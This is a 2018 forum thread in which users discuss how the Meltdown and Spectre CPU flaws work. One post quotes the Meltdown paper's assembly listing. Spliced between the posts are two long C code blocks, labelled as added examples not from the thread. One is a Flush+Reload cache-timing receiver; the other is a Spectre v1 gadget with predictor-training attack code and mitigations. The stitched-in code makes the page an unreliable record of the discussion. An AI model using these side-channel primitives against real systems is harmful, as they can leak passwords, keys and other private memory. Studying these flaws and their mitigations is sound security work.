
All times are UTC - 7 hours





Post new topic Reply to topic  [ 27 posts ]  Go to page 1, 2  Next
 Post subject: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 7:33 am 

Joined: Fri Nov 19, 2004 7:35 pm
Posts: 4003
Does anyone understand how this works? I understand Meltdown fine, but I have no idea what Spectre is supposed to be. Can anyone explain it?

_________________
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 7:39 am 

Joined: Fri Nov 12, 2004 2:49 pm
Posts: 7376
Location: Chexbres, VD, Switzerland
To be honest I didn't understand either bug, despite throwing a few hours at them. My understanding is that they exploit/abuse how branch prediction works and can retrieve data they should not be able to by doing an "if ()" reading illegal memory, and measuring the time it takes until the exception pops up. The bug is inherent to hardware, so the only way to not have it would be to discard branch prediction or not have a reliable timer.

Now, how could nobody think about this between 1995 and 2017, and then wait 6 more months before publishing it in January 2018, I really wonder - even though personally I wouldn't have thought of it.


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 7:55 am 

Joined: Fri Nov 19, 2004 7:35 pm
Posts: 4003
Meltdown makes perfect sense. The code snippet from the pdf is very easy to follow:
Code:
 ; rcx = kernel address
 ; rbx = probe array (256 pages, one per possible byte value)
 xor rax, rax                ; clear rax first (this line is in the paper's listing)
retry:
 mov al, byte [rcx]          ; faulting load; the byte is still forwarded to the next instructions transiently
 shl rax, 0xc                ; byte * 4096: select one page of the probe array
 jz retry                    ; a zero here usually means the data was not forwarded yet, so try again
 mov rbx, qword [rbx + rax]  ; transient load that pulls the selected page into the cache

The byte fetch will trigger an exception, but due to the flaw, it has already gone ahead and done the read into the probe array, so it is now cached. Even though the values are discarded, they were still used.

I saw the YouTube video demonstrating dumping kernel memory, so you can see that it clearly works.

Meltdown is easy to follow since it's in the same address space as the process. But Spectre remains a mystery to me.

_________________
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!
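An added example, not code from the Meltdown paper or from any poster in this thread, for the step the listing above leaves implicit: once the transient load has pulled probe[byte * 4096] into the cache, the attacker still has to turn "that page is now cached" into a byte value. That is done with Flush+Reload: evict all 256 pages, let the transient code run, then time one load per page and see which one comes back fast. Here the faulting kernel read is replaced by an ordinary load of a constructed secret so the file runs without crashing; the 120-cycle hit threshold, the rdtscp/clflush helpers, the scrambled page order and the round count are my assumptions and should be calibrated per machine.

```c
/* Added example (not from the Meltdown paper or this thread): the receiver side
 * of the cache covert channel used by Meltdown and Spectre. */
#include <stdint.h>
#include <stdio.h>

#define PAGE 4096u
#define ROUNDS 32
#define HIT_THRESHOLD 120      /* cycles; an assumption, calibrate on real hardware */

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static void flush_line(const void *p) { _mm_clflush(p); }
static uint64_t timed_load(const void *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);              /* rdtscp waits for earlier loads to finish */
    (void)*(volatile const uint8_t *)p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
#else
/* Portable fallback so the file builds elsewhere; without clflush nothing is
 * evicted, so only the tally/decode helpers are meaningful on these targets. */
#include <time.h>
static void flush_line(const void *p) { (void)p; }
static uint64_t timed_load(const void *p) {
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    (void)*(volatile const uint8_t *)p;
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint64_t)(b.tv_sec - a.tv_sec) * 1000000000ull + (uint64_t)(b.tv_nsec - a.tv_nsec);
}
#endif

static uint8_t probe[256 * PAGE] __attribute__((aligned(4096)));

/* Stand-in for the transient "mov rbx, [rbx + rax]": identical cache side
 * effect, done architecturally so the demo needs no faulting kernel read. */
static void encode_byte(uint8_t secret) {
    (void)*(volatile uint8_t *)&probe[(size_t)secret * PAGE];
}

static void flush_probe(void) {
    for (unsigned i = 0; i < 256; i++) flush_line(&probe[i * PAGE]);
}

/* Time one load per page, in a scrambled order so the hardware prefetcher does
 * not pull in the neighbour of the page just touched (167 is odd, so the
 * sequence visits every page exactly once). */
static void reload_probe(uint64_t times[256]) {
    for (unsigned i = 0; i < 256; i++) {
        unsigned k = (i * 167 + 13) & 255;
        times[k] = timed_load(&probe[k * PAGE]);
    }
}

/* Count which pages were cache hits this round. Pure, so it can be unit-tested. */
static void tally_round(const uint64_t times[256], uint64_t threshold, unsigned hits[256]) {
    for (unsigned i = 0; i < 256; i++)
        if (times[i] < threshold) hits[i]++;
}

/* Pick the byte with the most hits; -1 when nothing was ever fast or the top
 * two candidates tie (a noisy round: retry instead of trusting it). */
static int decode_hits(const unsigned hits[256]) {
    int best = -1;
    unsigned best_n = 0, second_n = 0;
    for (int i = 0; i < 256; i++) {
        if (hits[i] > best_n) { second_n = best_n; best_n = hits[i]; best = i; }
        else if (hits[i] > second_n) second_n = hits[i];
    }
    return (best_n == 0 || best_n == second_n) ? -1 : best;
}

/* Full receive loop: flush, let the "sender" run, reload, tally; repeat to
 * average out interrupts, prefetching and other cache noise. */
static int recover_byte(uint8_t secret) {
    unsigned hits[256] = {0};
    uint64_t times[256];
    for (int r = 0; r < ROUNDS; r++) {
        flush_probe();
        encode_byte(secret);          /* in the real attack: the victim's transient load */
        reload_probe(times);
        tally_round(times, HIT_THRESHOLD, hits);
    }
    return decode_hits(hits);
}

int main(void) {
    const char *msg = "sample secret";   /* constructed input for the demo */
    for (const char *p = msg; *p; p++) {
        int b = recover_byte((uint8_t)*p);
        putchar(b < 0 ? '?' : (char)b);
    }
    putchar('\n');
    return 0;
}
```

The majority vote in decode_hits is what makes the channel usable: a single reload round is easily spoiled by an interrupt landing mid-measurement, which is also why the noisy pixels in the demos people mention later in this thread do not mean the attack is failing, just that one round was thrown away.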


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 11:12 am 

Joined: Sun Jan 22, 2012 12:03 pm
Posts: 6041
Location: Canada
I think Meltdown is a more specific form of attack that more or less directly reads from kernel memory.

Spectre on the other hand seems to be a new area of vulnerability for exploiting existing programs. Like how an unchecked array bound in a program might leave you with a way to exploit it, now that we're aware of ways to manipulate and time branch prediction via the cache, a checked bound is vulnerable too if you can get it to mispredict the branch and do the array access anyway.

Like if you can run a javascript program in a browser, you can write that program to cause such mispredictions deliberately and use them to read everything the browser process knows, rather than just the stuff that javascript program is supposed to have access to. You have to know the program to be able to exploit it, not just the CPU.

At least, that's the gist of what I got from this whitepaper:
https://spectreattack.com/spectre.pdf
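The bounds-check-bypass pattern described in the post above, as an added example that is not from the Spectre paper or from anyone in this thread: a victim lookup whose check is perfectly correct, the same lookup hardened with a speculation barrier (lfence) and with branchless index masking, and the attacker's train-then-mispredict calling pattern. The names array1/array2 follow the paper's convention, but the sizes, the 512-byte stride, the secret string and the training loop length are assumptions. Reading the leak back out of array2 is the Flush+Reload job shown earlier and is not repeated here.

```c
/* Added example (not code from the Spectre paper or this thread): a Spectre v1
 * gadget and two ways to close it. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static void speculation_barrier(void) { _mm_lfence(); }   /* waits until older loads and branches resolve */
static void flush_line(const void *p) { _mm_clflush(p); }
#elif defined(__aarch64__)
static void speculation_barrier(void) { __asm__ volatile("dsb sy\n\tisb" ::: "memory"); }
static void flush_line(const void *p) { (void)p; }       /* no user-level flush; eviction needs a buffer walk */
#else
static void speculation_barrier(void) { __asm__ volatile("" ::: "memory"); }  /* compiler barrier only: NOT a mitigation */
static void flush_line(const void *p) { (void)p; }
#endif

static uint8_t array1[16] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
static size_t  array1_size = 16;                     /* a plain variable so the check really loads it */
static uint8_t array2[256 * 512];                    /* probe array the attacker can time; 512 B stride */
static const char secret[] = "constructed secret";   /* data the victim never returns on purpose */

/* 1. The vulnerable shape. Architecturally correct, but if the branch is
 *    predicted taken while array1_size is still coming from DRAM, both dependent
 *    loads run transiently for any x, and array2's cache state keeps array1[x]
 *    after the misprediction is squashed. */
uint8_t victim_vulnerable(size_t x) {
    if (x < array1_size)
        return array2[array1[x] * 512];
    return 0;
}

/* 2a. Serialising fence right after the check: nothing past it executes
 *     transiently. Simple, but costs tens of cycles on every call. */
uint8_t victim_fenced(size_t x) {
    if (x < array1_size) {
        speculation_barrier();
        return array2[array1[x] * 512];
    }
    return 0;
}

/* 2b. Branchless clamp, the idea behind Linux's array_index_nospec(): the mask
 *     is all ones when idx < size and zero otherwise, computed with arithmetic
 *     rather than a branch, so even a mispredicted check yields index 0.
 *     Requires size <= SIZE_MAX/2. */
size_t array_index_nospec(size_t idx, size_t size) {
    const unsigned top = sizeof(size_t) * 8 - 1;
    size_t in_bounds = ((idx | (size - 1 - idx)) >> top) ^ 1;   /* 1 iff idx < size */
    return idx & ((size_t)0 - in_bounds);
}

uint8_t victim_masked(size_t x) {
    if (x < array1_size) {
        x = array_index_nospec(x, array1_size);
        return array2[array1[x] * 512];
    }
    return 0;
}

/* 3. The attacker's calling pattern: many in-bounds calls train the predictor,
 *    array1_size is evicted so the check resolves late, and the last call
 *    carries the out-of-bounds offset. x is selected with arithmetic, not an
 *    if, so the attacker's own branch does not disturb the training. */
void train_then_attack(uint8_t (*victim)(size_t), size_t malicious_x) {
    for (int i = 0; i < 30; i++) {
        flush_line(&array1_size);
        size_t last = (size_t)0 - (size_t)(i == 29);          /* all ones only on the final iteration */
        size_t x = (((size_t)i % array1_size) & ~last) | (malicious_x & last);
        victim(x);
    }
}

int main(void) {
    /* Offset from array1 to the secret, computed the way a PoC does it. */
    size_t off = (size_t)((uintptr_t)secret - (uintptr_t)array1);
    train_then_attack(victim_vulnerable, off);   /* transient out-of-bounds read possible here */
    train_then_attack(victim_masked, off);       /* index forced to 0 even when mispredicted */
    printf("offset %zu masked to index %zu\n", off, array_index_nospec(off, array1_size));
    return 0;
}
```

Whether the vulnerable variant actually leaks on a given machine depends on the predictor and on array1_size really missing in cache; the masking variant is the one worth copying, because it is cheap, portable and does not rely on the compiler keeping a fence in place.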


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 11:33 am 

Joined: Fri Nov 19, 2004 7:35 pm
Posts: 4003
So spectre basically requires scripting or other ways of executing code within another process? Got it.

Seems like it would be useful for exploiting web browsers to find out the address layout before going to ROP.

_________________
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 11:44 am 

Joined: Sun Apr 13, 2008 11:12 am
Posts: 6814
Location: Seattle
Both flaws require the ability to run arbitrary but jailed code on the target CPU.

Both flaws involve the same ultimate failure: reading memory that you're "supposed" to not be able to. Meltdown's "just" the version that compromises the read protection guarantees made by the page table.


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 12:41 pm 

Joined: Thu Mar 31, 2016 11:15 am
Posts: 279
Dwedit wrote:
So spectre basically requires scripting or other ways of executing code within another process? Got it.


It's less restrictive than that. If you have a sequence of bytes you want to run and that sequence of bytes happens to exist in the program's address space, you can train the branch predictor from outside the program to jump there and execute it speculatively. And since speculative execution touches the cache, it can be used to leak information.


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 2:07 pm 

Joined: Sun Jan 22, 2012 12:03 pm
Posts: 6041
Location: Canada
The prognosis I've understood is that Meltdown can be corrected by having the OS take protective measures with its kernel paging, at some performance cost. Spectre is more insidious, since it operates from within a program in its own space, and exploits very normal and extremely common code (e.g. jump tables, bounded array lookups, etc.). Not something that can really be patched directly, or that most software developers could even try to prevent, but probably browsers and other critical stuff can be vigilant in addressing known attacks as they appear. A hydra monster always growing new heads.

I feel like Intel is about to have a very good sales year once they get a new CPU revision out. ;P

(Also, the Spectre attacks work on most CPUs, not just Intel design?)


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 3:01 pm 

Joined: Sun Apr 13, 2008 11:12 am
Posts: 6814
Location: Seattle
Both of these flaws are obvious-in-hindsight failures given any kind of speculative fetch at all. There's a reason why Spectre basically affects every fast CPU ever: speculative fetch is just way too huge a performance benefit to think that you could possibly recoup the performance loss by excluding it.

Meltdown, for whatever it's worth, doesn't only affect Intel's CPU. It's just that Intel was the only corporation to consistently put the permissions check on the wrong (i.e. higher performance) side of the L1 cache fetch. But there's a reason why the newest highest-performing ARM cores are also vulnerable. I think I remember reading it being true of several markedly older POWER cores, too.

There's a fascinating article that came up in the wake of these revelations about the PowerPC core in the Xbox 360 and its cache-coherency-violating XDCBT instruction.


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 3:50 pm 

Joined: Fri Nov 12, 2004 2:49 pm
Posts: 7376
Location: Chexbres, VD, Switzerland
rainwarrior wrote:
I think Meltdown is a more specific form of attack that more or less directly reads from kernel memory.

Also my understanding is that Spectre is more like a family of possible exploits, while Meltdown is a particular implementation of such an exploit that actually works. I might be wrong.

Quote:
Like if you can run a javascript program in a browser, you can write that program to cause such mispredictions deliberately and use them to read everything the browser process knows, rather than just the stuff that javascript program is supposed to have access to. You have to know the program to be able to exploit it, not just the CPU.

So in my understanding, for Spectre to work you need a very specific CPU *and* a very specific version of a very specific program; with programs constantly updating every week, the exploit has to be updated as well to take account of new low-level code. Also it only allows spying on data on one person's computer, which is indeed problematic, but Google already does that for everyone using Chrome or any Google-related website, so it's nothing new - it doesn't allow writing to memory, so it can't actually be used to implement malware.
Quote:
Both of these flaws are obvious-in-hindsight failures given any kind of speculative fetch at all. There's a reason why Spectre basically affects every fast CPU ever: speculative fetch is just way too huge a performance benefit to think that you could possibly recoup the performance loss by excluding it.

My understanding is that you access data not by reading it directly, but by measuring the time it takes to read it, and seeing whether it was a cache hit or miss, so data is "read" one bit at a time, and some kind of timer is probably used to measure this time. If the timer is made inaccurate enough that it can't accurately distinguish the difference between a cache hit and a cache miss, then data can't be retrieved accurately and the exploit is impossible, even if speculative execution is still enabled. Even in the current state I think there are some bits which are sometimes read wrongly, as I have seen a video drawing a cat picture with Spectre, and there was some random noise on the picture. So just fixing the timer to be inaccurate might solve the issue.

Quote:
I feel like Intel is about to have a very good sales year once they get a new CPU revision out. ;P

Or AMD ;P

(By the way, Intel Itanium processors seem to be unaffected because they lack hardware speculative execution, which is mostly done at compile time)


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 4:27 pm 

Joined: Sun Jan 22, 2012 12:03 pm
Posts: 6041
Location: Canada
It doesn't need to be quite that specific, I don't think. Your exploiting program can actually search for the needed code fragments to exploit (and you can even use stuff in shared DLLs). I think you need to know something about the program to find an opening in the first place, but I think it'd be tough to sanitize a big API like javascript. There's probably clever ways to prevent a lot of it, but it seems like there are a lot of open holes.

As for timers, you can always repeat the tests to get around timer accuracy. It doesn't close the hole, just reduces bandwidth? That might actually be one of the things browsers have currently disabled in response, though there might be multiple ways to create effective timers?

Edit: Yes, it looks like exactly that was done. https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/


Then again, I'm surprised that I haven't yet seen news of this thing in action. Just research demos. Where's the Spectre supervirus? Maybe we're lucky and it's too hard to use effectively?


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 6:28 pm 

Joined: Sun Apr 13, 2008 11:12 am
Posts: 6814
Location: Seattle
Both Spectre and Meltdown are "only" (n.b. scare quotes; I don't mean to imply this isn't a serious problem) useful for exfiltration. Meltdown lets you bypass kASLR ... if you have an attack that would have been hampered by having to find entry points. Spectre lets you use javascript to read sensitive data out of another web browser tab ... if the attackee has sensitive data to read.

Like an FTP server providing read-only access to the entire filesystem, the attacker still has to have something to actually attack. It just makes that attack easier.


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 6:34 pm 

Joined: Sun Sep 19, 2004 11:12 pm
Posts: 19675
Location: NE Indiana, USA (NTSC)
lidnariq wrote:
Like an FTP server providing read-only access to the entire filesystem, the attacker still has to have something to actually attack.

Your password manager, your cryptocurrency wallets, and your PGP and SSH private keys, for a start. Someone who can SSH in can install ransomware.


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 6:48 pm 

Joined: Sun Jan 22, 2012 12:03 pm
Posts: 6041
Location: Canada
Seeing news today about bitcoin miners slipping into YouTube ads doesn't fill me with hope. :(
https://arstechnica.com/information-technology/2018/01/now-even-youtube-serves-ads-with-cpu-draining-cryptocurrency-miners/

Not a Spectre thing, of course, but it's a bit scary that unintended execution like this can even happen on a site like YouTube, that I'd normally presume is safe to visit.


 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 8:09 pm 

Joined: Sat Apr 25, 2015 1:47 pm
Posts: 356
Location: FL
rainwarrior wrote:
Not a Spectre thing, of course, but it's a bit scary that unintended execution like this can even happen on a site like YouTube, that I'd normally presume is safe to visit.

And this is exactly why ad blockers are such a valuable anti-malware tool.

